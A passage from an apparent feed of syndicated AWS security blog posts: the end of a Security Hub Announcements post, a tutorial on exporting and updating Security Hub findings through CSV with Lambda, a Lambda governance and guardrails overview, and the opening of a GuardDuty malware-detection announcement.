  "SigningCertURL" : "https://sns.us-west-2.amazonaws.com/SimpleNotificationService-56e67fcb41f6fec09b0196692625d385.pem",
  "UnsubscribeURL" : "https://sns.us-west-2.amazonaws.com/?Action=Unsubscribe&SubscriptionArn=arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements:1eb29a83-8726-4366-891c-293ad5e35a53"
}

Note: You need to set up the SQS access policy in order for SNS to push messages to the SQS queue. For more information, see Basic examples of Amazon SQS policies.
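As an illustration, the following sketch applies such a policy with boto3; the queue URL and ARN are placeholders, and the topic ARN is the us-west-2 ARN used elsewhere in this post.

import json
import boto3

sqs = boto3.client("sqs")

queue_url = "https://sqs.us-west-2.amazonaws.com/111122223333/sechub-announcements"  # placeholder
queue_arn = "arn:aws:sqs:us-west-2:111122223333:sechub-announcements"  # placeholder
topic_arn = "arn:aws:sns:us-west-2:393883065485:SecurityHubAnnouncements"

# Allow the Security Hub Announcements topic to send messages to this queue.
policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Service": "sns.amazonaws.com"},
        "Action": "sqs:SendMessage",
        "Resource": queue_arn,
        "Condition": {"ArnEquals": {"aws:SourceArn": topic_arn}},
    }],
}
sqs.set_queue_attributes(QueueUrl=queue_url, Attributes={"Policy": json.dumps(policy)})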

Available now

The SNS topic for Security Hub Announcements is available today in the Regions described in this post. Subscribe now to stay informed of Security Hub updates. With Amazon SNS, there is no minimum fee, and you pay only for what you use. For more information, see the Amazon SNS pricing page.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support. You can also start a new thread on AWS Security Hub re:Post to get answers from the community.

Want more AWS Security news? Follow us on Twitter.

Mike Saintcross

Mike Saintcross is a Security Consultant at AWS helping enterprise customers achieve their cloud security goals in an ever-changing threat landscape. His background is in Security Engineering with a focus on deep packet inspection, incident response, security orchestration, and automation.

Neha Joshi

Neha Joshi is a Senior Solutions Architect at AWS. She loves to brainstorm and develop solutions to help customers be successful on AWS. Outside of work, she enjoys hiking and audio books.

How to export AWS Security Hub findings to CSV format

Post Syndicated from Andy Robinson original https://aws.amazon.com/blogs/security/how-to-export-aws-security-hub-findings-to-csv-format/

AWS Security Hub is a central dashboard for security, risk management, and compliance findings from AWS Audit Manager, AWS Firewall Manager, Amazon GuardDuty, IAM Access Analyzer, Amazon Inspector, and many other AWS and third-party services. You can use the insights from Security Hub to get an understanding of your compliance posture across multiple AWS accounts. It is not unusual for a single AWS account to have more than a thousand Security Hub findings. Multi-account and multi-Region environments may have tens or hundreds of thousands of findings. With so many findings, it is important for you to get a summary of the most important ones. Navigating through duplicate findings, false positives, and benign positives can take time.

In this post, we demonstrate how to export those findings to comma separated values (CSV) formatted files in an Amazon Simple Storage Service (Amazon S3) bucket. You can analyze those files by using a spreadsheet, database applications, or other tools. You can use the CSV formatted files to change a set of status and workflow values to align with your organizational requirements, and update many or all findings at once in Security Hub.

The solution described in this post, called CSV Manager for Security Hub, uses an AWS Lambda function to export findings to a CSV object in an S3 bucket, and another Lambda function to update Security Hub findings by modifying selected values in the downloaded CSV file from an S3 bucket. You use an Amazon EventBridge scheduled rule to perform periodic exports (for example, once a week). CSV Manager for Security Hub also has an update function that allows you to update the workflow, customer-specific notation, and other customer-updatable values for many or all findings at once. If you’ve set up a Region aggregator in Security Hub, you should configure the primary CSV Manager for Security Hub stack to export findings only from the aggregator Region. However, you may configure other CSV Manager for Security Hub stacks that export findings from specific Regions or from all applicable Regions in specific accounts. This allows application and account owners to view their own Security Hub findings without having access to other findings for the organization.

How it works

CSV Manager for Security Hub has two main features:

  • Export Security Hub findings to a CSV object in an S3 bucket
  • Update Security Hub findings from a CSV object in an S3 bucket

Overview of the export function

The overview of the export function CsvExporter is shown in Figure 1.

Figure 1: Architecture diagram of the export function

Figure 1 shows the following numbered steps:

  1. In the AWS Management Console, you invoke the CsvExporter Lambda function with a test event.
  2. The export function calls the Security Hub GetFindings API action and gets a list of findings to export from Security Hub.
  3. The export function converts the most important fields for identifying and sorting findings into a 37-column CSV format (which includes 12 updatable columns) and writes the result to an S3 bucket. (A simplified sketch of this export loop follows the list.)
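The following simplified sketch shows the shape of that export loop; it writes four columns to a local file rather than the full 37-column object in Amazon S3 that CsvExporter produces.

import csv
import boto3

securityhub = boto3.client("securityhub")

with open("findings.csv", "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["Id", "ProductArn", "SeverityLabel", "Title"])
    # Page through every finding returned by GetFindings.
    paginator = securityhub.get_paginator("get_findings")
    for page in paginator.paginate():
        for finding in page["Findings"]:
            writer.writerow([
                finding["Id"],
                finding["ProductArn"],
                finding["Severity"]["Label"],
                finding["Title"],
            ])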

Overview of the update function

To update existing Security Hub findings that you previously exported, you can use the update function CsvUpdater to modify the respective rows and columns of the CSV file you exported, as shown in Figure 2. There are 12 modifiable columns out of 37 (any changes to other columns are ignored), which are described in more detail in Step 4: View or update findings in the CSV file later in this post.

Figure 2: Architecture diagram of the update function

Figure 2 shows the following numbered steps:

  1. You download the CSV file that the CsvExporter function generated from the S3 bucket and update as needed.
  2. You upload the CSV file that contains your updates to the S3 bucket.
  3. In the AWS Management Console, you invoke the CsvUpdater Lambda function with a test event containing the URI of the CSV file.
  4. CsvUpdater reads the updated CSV file from the S3 bucket.
  5. CsvUpdater identifies the minimum set of updates and invokes the Security Hub BatchUpdateFindings API action.

Step 1: Use the CloudFormation template to deploy the solution

You can set up and use CSV Manager for Security Hub by using either AWS CloudFormation or the AWS Cloud Development Kit (AWS CDK).

To deploy the solution (AWS CDK)

You can find the latest code in the aws-security-hub-csv-manager GitHub repository, where you can also contribute to the sample code. The following commands show how to deploy the solution by using the AWS CDK. First, the AWS CDK initializes your environment and uploads the AWS Lambda assets to an S3 bucket. Then, you deploy the solution to your account by using the following commands. Replace <INSERT_AWS_ACCOUNT> with your account number, and replace <INSERT_REGION> with the AWS Region that you want the solution deployed to, for example us-east-1.

cdk bootstrap aws://<INSERT_AWS_ACCOUNT>/<INSERT_REGION>
cdk deploy

To deploy the solution (CloudFormation)

  1. Choose the following Launch Stack button to open the AWS CloudFormation console pre-loaded with the template for this solution:

    Launch Stack

  2. In the Parameters section, as shown in Figure 3, enter your values.
    Figure 3: CloudFormation template variables

    1. For What folder for CSV Manager for Security Hub Lambda code, leave the default Code. For What folder for CSV Manager for Security Hub exports, leave the default Findings.

      These are the folders within the S3 bucket that the CSV Manager for Security Hub CloudFormation template creates to store the Lambda code, as well as where the findings are exported by the Lambda function.

    2. For Frequency, for this solution you can leave the default value cron(0 8 ? * SUN *). This default causes automatic exports to occur every Sunday at 8:00 AM UTC using an EventBridge scheduled rule. For more information about how to update this value to meet your needs, see Schedule Expressions for Rules in the Amazon CloudWatch Events User Guide.
    3. The values you enter for the Regions field depend on whether you have configured an aggregation Region in Security Hub.
      • If you have configured an aggregation Region, enter only that Region code, for example eu-north-1, as shown in Figure 3.
      • If you haven’t configured an aggregation Region, enter a comma-separated list of Regions in which you have enabled Security Hub, for example us-east-1, eu-west-1, eu-west-2.
      • If you would like to export findings from all Regions where Security Hub is enabled, leave the Regions field blank. Regions where Security Hub is not enabled will generate a message and will be skipped.
  3. Choose Next.

The CloudFormation stack deploys the necessary resources, including an EventBridge scheduling rule, AWS Systems Manager Automation documents, an S3 bucket, and Lambda functions for exporting and updating Security Hub findings.

After you deploy the CloudFormation stack

After you create the CSV Manager for Security Hub stack, you can do the following:

  1. Perform the export function to write some or all Security Hub findings to a CSV file by following the instructions in Step 2: Export Security Hub findings to a CSV file later in this post.
  2. Perform a bulk update of Security Hub findings by following the instructions in Step 4: View or update findings in the CSV file later in this post. You can make changes to one or more of the 12 updatable columns of the CSV file, and perform the update function to update some or all Security Hub findings.

Step 2: Export Security Hub findings to a CSV file

You can export Security Hub findings from the AWS Lambda console. To do this, you create a test event and invoke the CsvExporter Lambda function. CsvExporter exports all Security Hub findings from all applicable Regions to a single CSV file in the S3 bucket for CSV Manager for Security Hub.

To export Security Hub findings to a CSV file

  1. In the AWS Lambda console, find the CsvExporter Lambda function and select it.
  2. On the Code tab, choose the down arrow at the right of the Test button, as shown in Figure 4, and select Configure test event.
    Figure 4: The down arrow at the right of the Test button

  3. To create an empty test event, on the Configure test event page, do the following:
    1. Choose Create a new event.
    2. Enter an event name; in this example we used testEvent.
    3. For Template, leave the default hello-world.
    4. For Event JSON, enter the JSON object {} as shown in Figure 5.
    Figure 5: Creating an empty test event

  4. Choose Save to save the empty test event.
  5. To invoke the Lambda function, choose the Test button, as shown in Figure 6.
    Figure 6: Test button to invoke the Lambda function

  6. On the Execution Results tab, note the following details, which you will need for the next step.
    {
      "message": "Export succeeded",
      "bucket": "DOC-EXAMPLE-BUCKET",
      "exportKey": "DOC-EXAMPLE-OBJECT",
      "resultCode": 200
    }

  7. Locate the CSV object that matches the value of "exportKey" (in this example, DOC-EXAMPLE-OBJECT) in the S3 bucket that matches the value of "bucket" (in this example, DOC-EXAMPLE-BUCKET).

Now you can view or update the findings in the CSV file, as described in the next section.

Step 3: (Optional) Using filters to limit CSV results

In your test event, you can specify any filter that is accepted by the GetFindings API action. You do this by adding a filter key to your test event. The filter key can either contain the word HighActive (which is a predefined filter configured as a default for selecting active high-severity and critical findings, as shown in Figure 8), or a JSON filter object.

Figure 8 depicts an example JSON filter that performs the same filtering as the HighActive predefined filter.

To use filters to limit CSV results

  1. In the AWS Lambda console, find the CsvExporter Lambda function and select it.
  2. On the Code tab, choose the down arrow at the right of the Test button, as shown in Figure 7, and select Configure test event.
    Figure 7: The down arrow at the right of the Test button

  3. To create a test event containing a filter, on the Configure test event page, do the following:
    1. Choose Create a new event.
    2. Enter an event name; in this example we used filterEvent.
    3. For Template, select testEvent.
    4. For Event JSON, enter the following JSON object, as shown in Figure 8.
      {
         "SeverityLabel":[
            {
               "Value":"CRITICAL",
               "Comparison":"EQUALS"
            },
            {
               "Value":"HIGH",
               "Comparison":"EQUALS"
            }
         ],
         "RecordState":[
            {
               "Comparison":"EQUALS",
               "Value":"ACTIVE"
            }
         ]
      }

      Figure 8: Example JSON filter for active CRITICAL and HIGH findings

    5. Choose Save.
  4. To invoke the Lambda function, choose the Test button as shown in Figure 9.
    Figure 9: Test button to invoke the Lambda function

  5. On the Execution Results tab, note the following details, which you will need for the next step.
    {
      "message": "Export succeeded",
      "bucket": "DOC-EXAMPLE-BUCKET",
      "exportKey": "DOC-EXAMPLE-OBJECT",
      "resultCode": 200
    }

  6. Locate the CSV object that matches the value of "exportKey" (in this example, DOC-EXAMPLE-OBJECT) in the S3 bucket that matches the value of "bucket" (in this example, DOC-EXAMPLE-BUCKET).

The results in this CSV file should be a filtered set of Security Hub findings according to the filter you specified above. You can now proceed to step 4 if you want to view or update findings.

Step 4: View or update findings in the CSV file

You can use any program that allows you to view or edit CSV files, such as Microsoft Excel. The first row in the CSV file contains the column names. These column names correspond to fields in the JSON objects that are returned by the GetFindings API action.

Warning: Do not modify the first two columns, Id (column A) or ProductArn (column B). If you modify these columns, Security Hub will not be able to locate the finding to update, and any other changes to that finding will be discarded.

You can locally modify any of the columns in the CSV file, but only 12 of the 37 columns will actually be updated if you use CsvUpdater to update Security Hub findings. The following are the 12 columns you can update. These correspond to columns C through N in the CSV file.

Column name Spreadsheet column Description
Criticality C An integer value between 0 and 100.
Confidence D An integer value between 0 and 100.
NoteText E Any text you wish.
NoteUpdatedBy F Automatically updated with your AWS principal user ID.
CustomerOwner* G Information identifying the owner of this finding (for example, email address).
CustomerIssue* H A Jira issue or another identifier tracking a specific issue.
CustomerTicket* I A ticket number or other trouble/problem tracking identification.
ProductSeverity** J A floating-point number from 0.0 to 99.9.
NormalizedSeverity** K An integer between 0 and 100.
SeverityLabel L One of the following:

  • INFORMATIONAL
  • LOW
  • MEDIUM
  • HIGH
  • CRITICAL
VerificationState M One of the following:

  • UNKNOWN — Finding has not been verified yet.
  • TRUE_POSITIVE — This is a valid finding and should be treated as a risk.
  • FALSE_POSITIVE — This is an incorrect finding and should be ignored or suppressed.
  • BENIGN_POSITIVE — This is a valid finding, but the risk is not applicable or has been accepted, transferred, or mitigated.
Workflow N One of the following:

  • NEW — This is a new finding that has not been reviewed.
  • NOTIFIED — The responsible party or parties have been notified of this finding.
  • RESOLVED — The finding has been resolved.
  • SUPPRESSED — A false or benign finding has been suppressed so that it does not appear as a current finding in Security Hub.

* These columns are stored inside the UserDefinedFields field of the updated findings. The column names imply a certain kind of information, but you can put any information you wish.

** These columns are stored inside the Severity field of the updated findings. These values have a fixed format and will be rejected if they do not meet that format.

Columns with fixed text values (L, M, N) in the previous table can be specified in mixed case and without underscores—they will be converted to all uppercase and underscores added in the CsvUpdater Lambda function. For example, “false positive” will be converted to “FALSE_POSITIVE”.
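A one-line Python sketch of that normalization, assuming only case and space handling:

def normalize(value: str) -> str:
    # "false positive" -> "FALSE_POSITIVE"
    return value.strip().upper().replace(" ", "_")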

Step 5: Create a test event and update Security Hub by using the CSV file

If you want to update Security Hub findings, make your changes to columns C through N as described in the previous table. After you make your changes in the CSV file, you can update the findings in Security Hub by using the CSV file and the CsvUpdater Lambda function.

Use the following procedure to create a test event and run the CsvUpdater Lambda function.

To create a test event and run the CsvUpdater Lambda function

  1. In the AWS Lambda console, find the CsvUpdater Lambda function and select it.
  2. On the Code tab, choose the down arrow to the right of the Test button, as shown in Figure 10, and select Configure test event.
    Figure 10: The down arrow to the right of the Test button

  3. To create a test event as shown in Figure 11, on the Configure test event page, do the following:
    1. Choose Create a new event.
    2. Enter an event name; in this example we used testEvent.
    3. For Template, leave the default hello-world.
    4. For Event JSON, enter the following:
      {
        "input": "<s3ObjectUri>",
        "primaryRegion": "<aggregationRegionName>"
      }

      Replace <s3ObjectUri> with the full URI of the S3 object where the updated CSV file is located.

      Replace <aggregationRegionName> with your Security Hub aggregation Region, or the primary Region in which you initially enabled Security Hub.

      Figure 11: Create and save a test event for the CsvUpdater Lambda function

  4. Choose Save.
  5. Choose the Test button, as shown in Figure 12, to invoke the Lambda function.
    Figure 12: Test button to invoke the Lambda function

  6. To verify that the Lambda function ran successfully, on the Execution Results tab, review the results for “message”: “Success”, as shown in the following example. Note that the results may be thousands of lines long.
    {
      "message": "Success",
      "details": {
        "processed": [{"Id": "arn:aws:securityhub:us-east-1:111122223333:subscription/cis-aws-foundations-benchmark/v/1.2.0/1.7/finding/6d543b22-6a3d-405c-ae7f-224469bde7d2", "ProductArn": "arn:aws:securityhub:us-east-1::product/aws/securityhub"}, … ],
        "unprocessed": [],
        "message": "Updated succeeded",
        "success": true
      },
      "input": "s3://DOC-EXAMPLE-BUCKET/DOC-EXAMPLE-OBJECT",
      "resultCode": 200
    }

    The processed array lists every successfully updated finding by Id and ProductArn.

    If any of the findings were not successfully updated, their Id and ProductArn appear in the unprocessed array. In the previous example, no findings were unprocessed.

    The value s3://DOC-EXAMPLE-BUCKET/DOC-EXAMPLE-OBJECT is the URI of the S3 object from which your updates were read.
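
If you prefer to skip the console test event, you can invoke the function directly with the AWS SDK for Python (Boto3). This is a minimal sketch; the function name and S3 URI are placeholders for your deployed values:

import json

import boto3

lambda_client = boto3.client("lambda")

response = lambda_client.invoke(
    FunctionName="CsvUpdater",  # placeholder: use your deployed function name
    Payload=json.dumps({
        "input": "s3://DOC-EXAMPLE-BUCKET/DOC-EXAMPLE-OBJECT",
        "primaryRegion": "us-east-1",
    }),
)

result = json.loads(response["Payload"].read())
print(result.get("message"))  # expect "Success"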

Cleaning up

To avoid incurring future charges, first delete the CloudFormation stack that you deployed in Step 1: Use the CloudFormation template to deploy the solution. Next, you need to manually delete the S3 bucket deployed with the stack. For instructions, see Deleting a bucket in the Amazon Simple Storage Service User Guide.

Conclusion

In this post, we showed you how you can export Security Hub findings to a CSV file in an S3 bucket and update the exported findings by using CSV Manager for Security Hub. We showed you how you can automate this process by using AWS Lambda, Amazon S3, and AWS Systems Manager. Full documentation for CSV Manager for Security Hub is available in the aws-security-hub-csv-manager GitHub repository. You can also investigate other ways to manage Security Hub findings by checking out our blog posts about Security Hub integration with Amazon OpenSearch Service, Amazon QuickSight, Slack, PagerDuty, Jira, or ServiceNow.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub re:Post. To learn more or get started, visit AWS Security Hub.

Want more AWS Security news? Follow us on Twitter.

Andy Robinson

Andy wrote CSV Manager for Security Hub in response to requests from several customers. He is an AWS Professional Services Senior Security Consultant with over 30 years of security, software product management, and software design experience. Andy is also a pilot, scuba instructor, martial arts instructor, ham radio enthusiast, and photographer.

Murat Eksi

Murat is a full-stack technologist at AWS Professional Services. He has worked with various industries, including finance, sports, media, gaming, manufacturing, and automotive, to accelerate their business outcomes through application development, security, IoT, analytics, devops and infrastructure. Outside of work, he loves traveling around the world, learning new languages while setting up local events for entrepreneurs and business owners in Stockholm, or taking flight lessons.

Shikhar Mishra

Shikhar is a Senior Solutions Architect at Amazon Web Services. He is a cloud security enthusiast and enjoys helping customers design secure, reliable, and cost-effective solutions on AWS.

Rohan Raizada

Rohan is a Solutions Architect for Amazon Web Services. He works with enterprises of all sizes with their cloud adoption to build scalable and secure solutions using AWS. During his free time, he likes to spend time with family and go cycling outdoors.

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on threat detection and incident response. Today, he helps enterprise customers develop a comprehensive security strategy and deploy security solutions at scale, and he trains customers on AWS Security best practices.

Building AWS Lambda governance and guardrails

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/building-aws-lambda-governance-and-guardrails/

When building serverless applications using AWS Lambda, there are a number of considerations regarding security, governance, and compliance. This post highlights how Lambda, as a serverless service, simplifies cloud security and compliance so you can concentrate on your business logic. It covers controls that you can implement for your Lambda workloads to ensure that your applications conform to your organizational requirements.

The Shared Responsibility Model

The AWS Shared Responsibility Model distinguishes between what AWS is responsible for and what customers are responsible for with cloud workloads. AWS is responsible for “Security of the Cloud” where AWS protects the infrastructure that runs all the services offered in the AWS Cloud. Customers are responsible for “Security in the Cloud”, managing and securing their workloads. When building traditional applications, you take on responsibility for many infrastructure services, including operating systems and network configuration.

Traditional application shared responsibility

One major benefit when building serverless applications is shifting more responsibility to AWS so you can concentrate on your business applications. AWS handles managing and patching the underlying servers, operating systems, and networking as part of running the services.

Serverless application shared responsibility

For Lambda, AWS manages the application platform where your code runs, which includes patching and updating the managed language runtimes. This reduces the attack surface while making cloud security simpler. You are responsible for the security of your code and AWS Identity and Access Management (IAM) to the Lambda service and within your function.

Lambda is SOC, HIPAA, PCI, and ISO compliant. For more information, see Compliance validation for AWS Lambda and the latest Lambda certification and compliance readiness services in scope.

Lambda isolation

Lambda functions run in separate isolated AWS accounts that are dedicated to the Lambda service. Lambda invokes your code in a secure and isolated runtime environment within the Lambda service account. A runtime environment is a collection of resources running in a dedicated hardware-virtualized micro virtual machine (MVM) on a Lambda worker node.

Lambda workers are bare metal EC2 Nitro instances, which are managed and patched by the Lambda service team. They have a maximum lease lifetime of 14 hours to keep the underlying infrastructure secure and fresh. MVMs are created by Firecracker, an open source virtual machine monitor (VMM) that uses Linux’s Kernel-based Virtual Machine (KVM) to create and manage MVMs securely at scale.

MVMs maintain a strong separation between runtime environments at the virtual machine hardware level, which increases security. Runtime environments are never reused across functions, function versions, or AWS accounts.

Isolation model for AWS Lambda workers

Network security

Lambda functions always run inside secure Amazon Virtual Private Clouds (Amazon VPCs) owned by the Lambda service. This gives the Lambda function access to AWS services and the public internet. There is no direct network inbound access to Lambda workers, runtime environments, or Lambda functions. All inbound access to a Lambda function only comes via the Lambda Invoke API, which sends the event object to the function handler.

You can configure a Lambda function to connect to private subnets in a VPC in your account if necessary, which you can control with IAM condition keys. The Lambda function still runs inside the Lambda service VPC but sends all network traffic through your VPC. Function outbound traffic comes from your own network address space.

AWS Lambda service VPC with VPC-to-VPC NAT to customer VPC

To give your VPC-connected function access to the internet, route outbound traffic to a NAT gateway in a public subnet. Connecting a function to a public subnet doesn’t give it internet access or a public IP address, as the function is still running in the Lambda service VPC and then routing network traffic into your VPC.

All internal AWS traffic uses the AWS Global Backbone rather than traversing the internet. You do not need to connect your functions to a VPC to avoid connectivity to AWS services over the internet. VPC connected functions allow you to control and audit outbound network access.

You can use security groups to control outbound traffic for VPC-connected functions and network ACLs to block access to CIDR IP ranges or ports. VPC endpoints allow you to enable private communications with supported AWS services without internet access.

You can use VPC Flow Logs to audit traffic going to and from network interfaces in your VPC.

Runtime environment re-use

Each runtime environment processes a single request at a time. After Lambda finishes processing the request, the runtime environment is ready to process an additional request for the same function version. For more information on how Lambda manages runtime environments, see Understanding AWS Lambda scaling and throughput.

Data can persist in the local temporary filesystem path, in globally scoped variables, and in environment variables across subsequent invocations of the same function version. Ensure that you only handle sensitive information within individual invocations of the function by processing it in the function handler, or using local variables. Do not re-use files in the local temporary filesystem to process unencrypted sensitive data. Do not put sensitive or confidential information into Lambda environment variables, tags, or other freeform fields such as Name fields.
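
The following sketch illustrates the distinction for a Python function: the client created at module scope is intentionally re-used across invocations, while sensitive request data stays in handler-local variables (process_payment is a hypothetical placeholder):

import boto3

# Created once per runtime environment and re-used across invocations.
# Safe for clients and static configuration, not for sensitive data.
s3 = boto3.client("s3")

def handler(event, context):
    # Keep sensitive values in handler-local variables so they do not
    # outlive the invocation that processed them.
    card_number = event.get("card_number")
    process_payment(card_number)
    # Avoid writing card_number to module-level variables or to /tmp,
    # both of which can persist into later invocations.
    return {"status": "ok"}

def process_payment(card_number):
    pass  # hypothetical business logic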

For more Lambda security information, see the Lambda security whitepaper.

Multiple accounts

AWS recommends using multiple accounts to isolate your resources because they provide natural boundaries for security, access, and billing. Use AWS Organizations to manage and govern individual member accounts centrally. You can use AWS Control Tower to automate many of the account build steps and apply managed guardrails to govern your environment. These include preventative guardrails to limit actions and detective guardrails to detect and alert on non-compliance resources for remediation.

Lambda access controls

Lambda permissions define what a Lambda function can do, and who or what can invoke the function. Consider the following areas when applying access controls to your Lambda functions to ensure least privilege:

Execution role

Lambda functions have permission to access other AWS resources using execution roles. This is an AWS principal that the Lambda service assumes, which grants permissions using identity policy statements assigned to the role. The Lambda service uses this role to fetch and cache temporary security credentials, which are then available as environment variables during a function’s invocation. It may re-use these credentials across different runtime environments that use the same execution role.

Ensure that each function has its own unique role with the minimum set of permissions.
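
As a sketch of what that looks like with the AWS SDK for Python (Boto3), the following creates a role that Lambda can assume and attaches an inline policy scoped to a single read action on a single table (the role name, table ARN, and account ID are placeholders):

import json

import boto3

iam = boto3.client("iam")

trust_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Service": "lambda.amazonaws.com"},
        "Action": "sts:AssumeRole",
    }],
}

iam.create_role(
    RoleName="my-function-role",  # placeholder
    AssumeRolePolicyDocument=json.dumps(trust_policy),
)

# Grant only the single read action this function needs.
read_only_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": "dynamodb:GetItem",
        "Resource": "arn:aws:dynamodb:us-east-1:111122223333:table/my-table",
    }],
}

iam.put_role_policy(
    RoleName="my-function-role",
    PolicyName="least-privilege-read",
    PolicyDocument=json.dumps(read_only_policy),
)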

Identity/user policies

IAM identity policies are attached to IAM users, groups, or roles. These policies allow users or callers to perform operations on Lambda functions. You can restrict who can create functions, or control what functions particular users can manage.

Resource policies

Resource policies define what identities have fine-grained inbound access to managed services. For example, you can restrict which Lambda function versions can add events to a specific Amazon EventBridge event bus. You can use resource-based policies on Lambda resources to control what AWS IAM identities and event sources can invoke a specific version or alias of your function. You also use a resource-based policy to allow an AWS service to invoke your function on your behalf. To see which services support resource-based policies, see “AWS services that work with IAM”.
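
For example, the following Boto3 sketch grants a single EventBridge rule permission to invoke only the prod alias of a function (the names and rule ARN are placeholders):

import boto3

lambda_client = boto3.client("lambda")

lambda_client.add_permission(
    FunctionName="my-function",   # placeholder
    Qualifier="prod",             # restrict the grant to one alias
    StatementId="AllowEventBridgeRule",
    Action="lambda:InvokeFunction",
    Principal="events.amazonaws.com",
    SourceArn="arn:aws:events:us-east-1:111122223333:rule/my-rule",
)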

Attribute-based access control (ABAC)

With attribute-based access control (ABAC), you can use tags to control access to your Lambda functions. With ABAC, you can scale an access control strategy by setting granular permissions with tags without requiring permissions updates for every new user or resource as your organization scales. You can also use tag policies with AWS Organizations to standardize tags across resources.
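
The following identity policy fragment sketches the ABAC pattern, allowing actions only when the function's team tag matches the caller's team tag; verify in the Lambda documentation which actions support the aws:ResourceTag condition key before relying on this:

import json

abac_policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["lambda:GetFunction", "lambda:UpdateFunctionConfiguration"],
        "Resource": "*",
        "Condition": {
            # Allow access only when the function's tag matches the caller's tag.
            "StringEquals": {"aws:ResourceTag/team": "${aws:PrincipalTag/team}"}
        },
    }],
}

print(json.dumps(abac_policy, indent=2))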

Permissions boundaries

Permissions boundaries are a way to delegate permission management safely. The boundary places a limit on the maximum permissions that a policy can grant. For example, you can use boundary permissions to limit the scope of the execution role to allow only read access to databases. A builder with permission to manage a function or with write access to the applications code repository cannot escalate the permissions beyond the boundary to allow write access.

Service control policies

When using AWS Organizations, you can use Service control policies (SCPs) to manage permissions in your organization. These provide guardrails for what actions IAM users and roles within the organization root or OUs can do. For more information, see the AWS Organizations documentation, which includes example service control policies.

Code signing

As you are responsible for the code that runs in your Lambda functions, you can ensure that only trusted code runs by using code signing with the AWS Signer service. AWS Signer digitally signs your code packages and Lambda validates the code package before accepting the deployment, which can be part of your automated software deployment process.

Auditing Lambda configuration, permissions and access

You should audit access and permissions regularly to ensure that your workloads are secure. Use the IAM console to view when an IAM role was last used.

IAM last used

IAM access advisor

Use IAM access advisor on the Access Advisor tab in the IAM console to review when an AWS service was last used from a specific IAM user or role. You can use this information to remove unused IAM policies and access from your IAM roles.

IAM access advisor

AWS CloudTrail

AWS CloudTrail helps you monitor, log, and retain account activity to provide a complete event history of actions across your AWS infrastructure. You can monitor Lambda API actions to ensure that only appropriate actions are made against your Lambda functions. These include CreateFunction, DeleteFunction, CreateEventSourceMapping, AddPermission, UpdateEventSourceMapping, UpdateFunctionConfiguration, and UpdateFunctionCode.
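
As a quick audit sketch, you can pull recent Lambda control-plane activity out of CloudTrail with Boto3 and review the event names and callers:

import boto3

cloudtrail = boto3.client("cloudtrail")

# Retrieve recent Lambda control-plane activity recorded by CloudTrail.
response = cloudtrail.lookup_events(
    LookupAttributes=[
        {"AttributeKey": "EventSource", "AttributeValue": "lambda.amazonaws.com"},
    ],
    MaxResults=50,
)

for event in response["Events"]:
    print(event["EventTime"], event["EventName"], event.get("Username", ""))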

AWS CloudTrail

IAM Access Analyzer

You can validate policies using IAM Access Analyzer, which provides over 100 policy checks with security warnings for overly permissive policies. To learn more about policy checks provided by IAM Access Analyzer, see “IAM Access Analyzer policy validation”.

You can also generate IAM policies based on access activity from CloudTrail logs, which contain the permissions that the role used in your specified date range.
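
The policy checks are also available programmatically. This sketch runs IAM Access Analyzer validation against an identity policy and prints any warnings (the policy shown is a deliberately broad example):

import json

import boto3

analyzer = boto3.client("accessanalyzer")

policy = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "lambda:*", "Resource": "*"}],
}

response = analyzer.validate_policy(
    policyDocument=json.dumps(policy),
    policyType="IDENTITY_POLICY",
)

for finding in response["findings"]:
    print(finding["findingType"], finding["issueCode"], "-", finding["findingDetails"])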

IAM Access Analyzer

AWS Config

AWS Config provides you with a record of the configuration history of your AWS resources. AWS Config monitors the resource configuration and includes rules to alert when they fall into a non-compliant state.

For Lambda, you can track and alert on changes to your function configuration, along with the IAM execution role. This allows you to gather Lambda function lifecycle data for potential audit and compliance requirements. For more information, see the Lambda Operators Guide.

AWS Config includes Lambda managed config rules such as lambda-concurrency-check, lambda-dlq-check, lambda-function-public-access-prohibited, lambda-function-settings-check, and lambda-inside-vpc. You can also write your own rules.

There are a number of other AWS services to help with security compliance.

  1. AWS Audit Manager: Collect evidence to help you audit your use of cloud services.
  2. Amazon GuardDuty: Detect unexpected and potentially unauthorized activity in your AWS environment.
  3. Amazon Macie: Evaluate your content to identify business-critical or potentially confidential data.
  4. AWS Trusted Advisor: Identify opportunities to improve stability, save money, or help close security gaps.
  5. AWS Security Hub: Provide security checks and recommendations across your organization.

Conclusion

Lambda makes cloud security simpler by taking on more responsibility using the AWS Shared Responsibility Model. Lambda implements strict workload security at scale to isolate your code and prevent network intrusion to your functions. This post provides guidance on assessing and implementing best practices and tools for Lambda to improve your security, governance, and compliance controls. These include permissions, access controls, multiple accounts, and code security. Learn how to audit your function permissions, configuration, and access to ensure that your applications conform to your organizational requirements.

For more serverless learning resources, visit Serverless Land.

New for Amazon GuardDuty – Malware Detection for Amazon EBS Volumes

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/new-for-amazon-guardduty-malware-detection-for-amazon-ebs-volumes/

With Amazon GuardDuty, you can monitor your AWS accounts and workloads to detect malicious activity. Today, we are adding to GuardDuty the capability to detect malware. Malware is malicious software that is used to compromise workloads, repurpose resources, or gain unauthorized access to data. When you have GuardDuty Malware Protection enabled, a malware scan is initiated when GuardDuty detects that one of your EC2 instances or container workloads running on EC2 is doing something suspicious. For example, a malware scan is triggered when an EC2 instance is communicating with a command-and-control server that is known to be malicious or is performing denial of service (DoS) or brute-force attacks against other EC2 instances.

GuardDuty supports many file system types and scans file formats known to be used to spread or contain malware, including Windows and Linux executables, PDF files, archives, binaries, scripts, installers, email databases, and plain emails.

